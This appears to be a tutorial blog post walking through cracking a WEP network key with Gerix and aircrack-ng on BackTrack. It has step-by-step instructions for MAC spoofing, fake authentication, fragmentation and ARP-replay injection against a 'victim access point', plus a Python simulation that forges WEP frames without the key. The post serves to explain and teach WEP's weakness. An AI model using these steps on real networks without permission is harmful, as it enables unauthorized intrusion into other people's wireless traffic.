I’m creating several posts at once, and I’ll be adding screenshots shortly; bear with me.
Boot into BackTrack 5 R2. You’ll need a laptop with a wireless card that supports monitor mode and packet injection (Gerix is a front-end for the aircrack-ng suite, so anything that works with airmon-ng/aireplay-ng works here).
Applications >BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng
Note: the pane at the bottom of Gerix shows the actions currently running and the output of the underlying tools, so if a step fails you can see exactly what went wrong.
With Gerix open, go to the Configuration Tab.
You should see your interface listed as wlan0. Select it and click the button below labeled Enable/Disable Monitor Mode. The card is now in monitor mode.
At this point you can also click Set random MAC address to spoof your MAC address; the spoofed address is the one Gerix will use for fake authentication and injection.
Click the interface labeled mon0 so it is highlighted. Underneath it you will see a Rescan Networks button. Click it to search for SSIDs.
Select the desired WEP network SSID.
Click the WEP tab. Click Start Sniffing and Logging. You should see the BSSID (the AP’s MAC address) loaded, along with the PWR (signal strength) and other data. Keep this window open: it is the capture that collects the IVs you will crack later.
Click Performs a test of injection AP to confirm your card can inject packets. You should get the message “Injection is working!”. You can close this window.
For this demonstration we will use WEP Attacks (no-client): there is no associated station generating traffic, so we will create the traffic ourselves. Click the button labeled as such.
Under Fragmentation attack, click Associate with AP using fake auth. This associates your (possibly spoofed) MAC with the AP so it will accept frames you inject; in the bottom data viewer window you will see it read “Fake authentication with mon0”.
Click the Fragmentation attack button. Once it finds a usable data packet it will prompt “Use this packet ?”. Type y for yes. The attack recovers the RC4 keystream for one IV, which is what the next step needs to build a frame the AP will accept.
Click Create the ARP packet to be injected on the victim access point. The ARP request is encrypted with the recovered keystream, not with the key.
Click Inject the created packet on victim access point. Type y in this box also. Keep this window open: every replay of the ARP request makes the AP answer with a freshly encrypted frame, and each of those carries a new IV for the capture.
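The steps above (fake auth, fragmentation attack, forged ARP request) all rest on one weakness of WEP: the frame body is plaintext XOR an RC4 keystream seeded with IV || key, and the integrity check is an unkeyed CRC32. The Python below is an added example, not code from this post, from Gerix or from aircrack-ng. It recovers 8 keystream bytes from the fixed LLC/SNAP header of a captured ARP frame, grows them to 1500 bytes the way aireplay-ng -5 does (the AP decrypts every fragment under the same IV and relays the reassembled packet under a fresh one), then forges an ARP request the AP accepts, without ever learning the key. The key, MAC addresses, IPs and the AccessPoint class are constructed for the demo; the AP model is a simplification of real 802.11 fragment handling.

```python
import struct
import zlib

SNAP_ARP = bytes.fromhex("aaaa030000000806")  # LLC/SNAP header, EtherType 0x0806 (ARP)
MAX_FRAGS = 16                                 # 802.11 fragment number is a 4-bit field

def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA); WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: plain CRC32, no key involved."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """What a legitimate station does: IV || (plaintext || ICV) XOR RC4(IV || key)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))

def wep_decrypt(key: bytes, frame: bytes):
    """Plaintext, or None when the ICV fails (the AP silently drops such frames)."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    plaintext, tag = body[:-4], body[-4:]
    return plaintext if icv(plaintext) == tag else None

def encrypt_with_keystream(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """What the attacker does: no key, only a known (IV, keystream) pair."""
    body = plaintext + icv(plaintext)
    assert len(body) <= len(keystream), "keystream too short for this frame"
    return iv + xor(body, keystream)

def recover_keystream(frame: bytes, known_plaintext: bytes = SNAP_ARP):
    """Known-plaintext step: ciphertext XOR the fixed SNAP header = keystream for this IV."""
    return frame[:3], xor(frame[3:], known_plaintext)

class AccessPoint:
    """Constructed AP model: checks each fragment's ICV, relays the packet under a new IV."""
    def __init__(self, key: bytes):
        self.key = key
        self.iv_counter = 0
    def relay_fragments(self, fragments):
        parts = []
        for frag in fragments:
            plaintext = wep_decrypt(self.key, frag)
            if plaintext is None:
                return None
            parts.append(plaintext)
        self.iv_counter += 1  # fresh IV on the relayed copy: this is what leaks more keystream
        return wep_encrypt(self.key, self.iv_counter.to_bytes(3, "big"), b"".join(parts))

def fragmentation_attack(ap: AccessPoint, captured_frame: bytes, target_len: int = 1500):
    """Grow an 8-byte keystream to target_len bytes without the key (what aireplay-ng -5 does)."""
    iv, keystream = recover_keystream(captured_frame)
    while len(keystream) < target_len:
        per_frag = len(keystream) - 4                    # plaintext that fits beside a 4-byte ICV
        total = min(target_len - 4, per_frag * MAX_FRAGS)
        chosen = bytes(i & 0xFF for i in range(total))   # attacker picks the plaintext, so it is known
        fragments = [encrypt_with_keystream(iv, keystream, chosen[k:k + per_frag])
                     for k in range(0, total, per_frag)]
        relayed = ap.relay_fragments(fragments)
        if relayed is None:
            raise RuntimeError("AP rejected a fragment: recovered keystream was wrong")
        iv, keystream = relayed[:3], xor(relayed[3:], chosen + icv(chosen))
    return iv, keystream

def build_arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP + ARP request, the packet packetforge-ng -0 builds for replay."""
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + sender_mac + sender_ip + b"\x00" * 6 + target_ip
    return SNAP_ARP + arp

def demo():
    """Constructed scenario: one captured ARP frame is enough to forge traffic the AP accepts."""
    key = bytes.fromhex("0102030405")                      # 40-bit WEP key, unknown to the attacker
    ap = AccessPoint(key)
    real = build_arp_request(bytes.fromhex("00112233aabb"), bytes([192, 168, 1, 10]), bytes([192, 168, 1, 1]))
    captured = wep_encrypt(key, b"\x5a\x3c\x01", real)     # the frame airodump-ng would have sniffed
    iv, keystream = fragmentation_attack(ap, captured)
    forged = build_arp_request(bytes.fromhex("deadbeef0001"), bytes([255] * 4), bytes([255] * 4))
    frame = encrypt_with_keystream(iv, keystream, forged)
    return len(keystream), wep_decrypt(key, frame) == forged

if __name__ == "__main__":
    print("keystream bytes recovered: %d, forged ARP accepted by AP: %s" % demo())
```

Three rounds are enough: 8 keystream bytes carry 4 bytes of plaintext per fragment, 16 fragments relay 64 bytes and yield 68 keystream bytes, the next round yields 1028, and the last round tops out at 1500. The forged ARP request is exactly the packet Gerix replays in the next step; because the key never enters the picture, changing the WEP key does not stop this, only retiring WEP does.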
Go to the Cracking tab and, under WEP Cracking, click the Aircrack-ng – Decrypt WEP password button. What you are watching here is the number of IVs aircrack-ng has read from the capture (reported as “got N IVs”).
You will generally need about 10,000 to 20,000 IVs to recover a 40-bit key, sometimes fewer; a 104-bit key usually needs considerably more. This can take 30 seconds to a couple of minutes depending on how much traffic the ARP replay is generating. You can safely close this window and click the button again to reopen it once enough IVs have been collected.
The key will be displayed in this window when the attack succeeds, as hex bytes (and as ASCII if it is printable).